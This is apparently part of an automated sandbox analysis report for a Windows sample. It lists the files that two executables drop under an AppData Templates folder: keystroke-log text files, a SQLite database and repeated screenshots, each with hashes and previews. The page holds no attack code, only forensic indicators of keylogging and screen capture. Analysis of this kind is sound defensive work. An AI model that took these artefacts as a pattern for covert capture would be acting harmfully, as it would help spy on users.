MD5:	7782A0FD57B637B231BA5FB66CBDAC8E
SHA1:	E0ECF4FACEAF807EC61D102FC783628B14372A53
SHA-256:	85BA6DC1D7149555B2C257C0A67E382A3EB3DFC07B1D427108C3CA9F524F77E7
SHA-512:	1F7F65ACD3205119B334AC1E34FE7EE45ABAD29A5C4BA5710E34980FB3EC0CF16454F4E9991C954B7DA51259F2A79FB08C27C6CEE7577D1443BE84CF11AD8402
Malicious:	false
Preview:	..[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:52]<<Program Manager>>....[08:28:52]<<Program Manager>>....[08:28:52]<<Program Manager>>....[08:28:52]<<Program Manager>>....[08:28:52]<<Program Manager>>....[08:28:58]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataqJHjVCwP.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2343
Entropy (8bit):	4.3622097223560585
Encrypted:	false
SSDEEP:	12:t6mmmmffffffffffffff2N2N2N2N2N2N2NJJJJJJJkfkfkfkfkfkfkfbdpbdpbdF:t6ssssssv
MD5:	19AFB3EBA5D7FF40EADB9E3748AC3633
SHA1:	7A91FB7703A11F351D99C8FC635478A68467C51C
SHA-256:	54B4D7896D3B3D9BAD603D246DA006C7E3B0EC4D897848E0C44C9FD5F66C50D7
SHA-512:	7E7D07900FFE10718F6B5401F1D602CE146A8671BFA11943B7175B94D9E5291F0F59B710AAE326D43ABD91334A4A3B9A692FDD82B8BAA6314FC15C93E87D8677
Malicious:	false
Preview:	..[08:27:58]<<Program Manager>>....[08:27:58]<<Program Manager>>....[08:27:58]<<Program Manager>>....[08:27:58]<<Program Manager>>....[08:27:58]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatatrjRbaEM.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2277
Entropy (8bit):	4.35764264457249
Encrypted:	false
SSDEEP:	12:t7fffffffffffffff2N2N2N2N2N2NJJJJJJJkfkfkfkfkfkfkfbdpbdpbdpbdpbO:tossssssi
MD5:	49C0FA6823AF1A9890AD7A692E13E8FD
SHA1:	38AC759D70C0883AA52C56C2A76B4807F11FB12C
SHA-256:	9AAF2740279A39DAD3088CDAA631C7C5F07B655640DB6C0FDB4EE4FE39DE3228
SHA-512:	B9DE85E4EEF073A5835C52436ACFB435291DBD39CE2BAC650A157912F8E0B29D5960E7A50717DBB75BA766371340C230821F6FF858A5B7385534F6D598E4EB69
Malicious:	false
Preview:	..[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:27:59]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:00]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:01]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:02]<<Program Manager>>....[08:28:03]<<Program Manager>>....[08:28:03]<<Program Manager>>....[08:28:0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatawoaulIUc.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.327104179501984
Encrypted:	false
SSDEEP:	12:t9RRYYYYYYYnnnnnnnCpCpCpCpCpCpyyyyyyyVNVNVNVNVNVNVNookZx:trcccccXL
MD5:	586E553A107E4FCE694204E81B8C28EE
SHA1:	7F8334F0057E812E7CE299A0B6EBB6656FDCC02F
SHA-256:	0EF11B234F10139398BE9030E123D07C6824194C682CD85F1A9467E0FCC5F5B5
SHA-512:	394B9E5CBBFABA141B053A085E269D0AAB24AD34A2C282D24F46CBD231CA07F5B742B9AF624F0EDFE25F7CA3787F6F00D46C86A47343980EADBBB267CE7F5A5F
Malicious:	false
Preview:	..[08:28:16]<<Program Manager>>....[08:28:16]<<Program Manager>>....[08:28:16]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:2

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogganchedTSADAsTxnerPUZbggalesaurus

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotEzWDIrve.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotFhXCvNZd.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758721827854674
Encrypted:	false
SSDEEP:	12288:VK1TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:qTev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	176B025E67A209CBDB69D440F9B06420
SHA1:	C6E44D5A619E28084E5EC640725A2CD741897C1C
SHA-256:	055150C4909D8B17DFD8A4384213EA4C49D08309D3A8E76948EC1716E484C5B3
SHA-512:	DF793CF8F52CA7502DF943A8993DB51A82118090B644FE802367E9F0E774E89EDE8DA3D3FF21510CFB9B5F5A67B685729CE20D66BFA0524F98C1A80C02618D04
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotIOGTyuIt.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758721827854674
Encrypted:	false
SSDEEP:	12288:VK1TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:qTev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	176B025E67A209CBDB69D440F9B06420
SHA1:	C6E44D5A619E28084E5EC640725A2CD741897C1C
SHA-256:	055150C4909D8B17DFD8A4384213EA4C49D08309D3A8E76948EC1716E484C5B3
SHA-512:	DF793CF8F52CA7502DF943A8993DB51A82118090B644FE802367E9F0E774E89EDE8DA3D3FF21510CFB9B5F5A67B685729CE20D66BFA0524F98C1A80C02618D04
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotLsDcbHmF.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotNIwYvUlB.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	modified
Size (bytes):	3932214
Entropy (8bit):	6.758721827854674
Encrypted:	false
SSDEEP:	12288:VK1TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:qTev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	176B025E67A209CBDB69D440F9B06420
SHA1:	C6E44D5A619E28084E5EC640725A2CD741897C1C
SHA-256:	055150C4909D8B17DFD8A4384213EA4C49D08309D3A8E76948EC1716E484C5B3
SHA-512:	DF793CF8F52CA7502DF943A8993DB51A82118090B644FE802367E9F0E774E89EDE8DA3D3FF21510CFB9B5F5A67B685729CE20D66BFA0524F98C1A80C02618D04
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotQVshfmPM.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	modified
Size (bytes):	3932214
Entropy (8bit):	6.758721827854674
Encrypted:	false
SSDEEP:	12288:VK1TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:qTev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	176B025E67A209CBDB69D440F9B06420
SHA1:	C6E44D5A619E28084E5EC640725A2CD741897C1C
SHA-256:	055150C4909D8B17DFD8A4384213EA4C49D08309D3A8E76948EC1716E484C5B3
SHA-512:	DF793CF8F52CA7502DF943A8993DB51A82118090B644FE802367E9F0E774E89EDE8DA3D3FF21510CFB9B5F5A67B685729CE20D66BFA0524F98C1A80C02618D04
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotSBrQkCnt.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotUTNfQpmI.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotWfhNxFGI.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotcOaxrXDV.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotiUmcOfOk.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.75872449335035
Encrypted:	false
SSDEEP:	12288:V1TTDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:rTev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	F49129CED91DE9B7978557BA90240C80
SHA1:	720E3D167787264AB67C87B3FD840DFED3BAC813
SHA-256:	541A1DCDDB8BA55E5CBBB3A75BD317964EB784A1AD00E03FF7C17CB77F3FA04F
SHA-512:	C7B65EEB9876032251C2E31FEA03DE9334FA66F48A9DE059EF656ECFD443D839200FB2565F5B8F384DFCF73CF1545D7FDBE4C7670C43001F6BB9B96B8583C0A9
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotjYGkDeUL.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotlIfajZMx.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotqSbFpYRY.BMP

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.714213232132537
Encrypted:	false
SSDEEP:	12288:V1TTDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZF:rTev2HYxTvaxtcTiJzVwEtbUfk7
MD5:	19CA6068310FA7CC58BA978CCF4E6E8C
SHA1:	604CC2513136C5EC65179E90B508F15B869AF3D2
SHA-256:	85160F40AB5268AB040E2A9898911132F51BD2AF760A750A1314483402693E68
SHA-512:	31B4CCFC96E958C10A8341204EDCCC6D0106B7D733D9F87A133BDFE23372B7FF116566B46FE37B6D8422EE5EB045FC0D0B53D7BCBA076C623D6AE73C1AA6DE89
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotqnBYIwMs.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotsZYTtjXA.BMP

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
Category:	dropped
Size (bytes):	3932214
Entropy (8bit):	6.758734732045272
Encrypted:	false
SSDEEP:	12288:VS7TDU5v2HYYpdqU1cvTrc7ewCkMLyHM5vamVyiCNJkV2OD+Czipo5NRMMUUUXZX:ATev2HYxTvaxtcTiJDJWcWYrX0w
MD5:	75D380C2BEE8170F0FD7E5845A0539D9
SHA1:	9F05E497A64A9A6A5EEB47ABD176EB8AD694F80F
SHA-256:	FEC0946EA3842C1BC031FFAF164F1885DE45465C7502E962BD4DDC0FC684C968
SHA-512:	81054D2D4D75B12E4A879966D1282E6C40FC2BFA02F6343E4751174EE6B5912D0FCFA0B3E46B1B584F8F39B7DD5C7FE7A4A1A3B858713F99CEE4009E168BC8F8
Malicious:	false
Preview:	BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

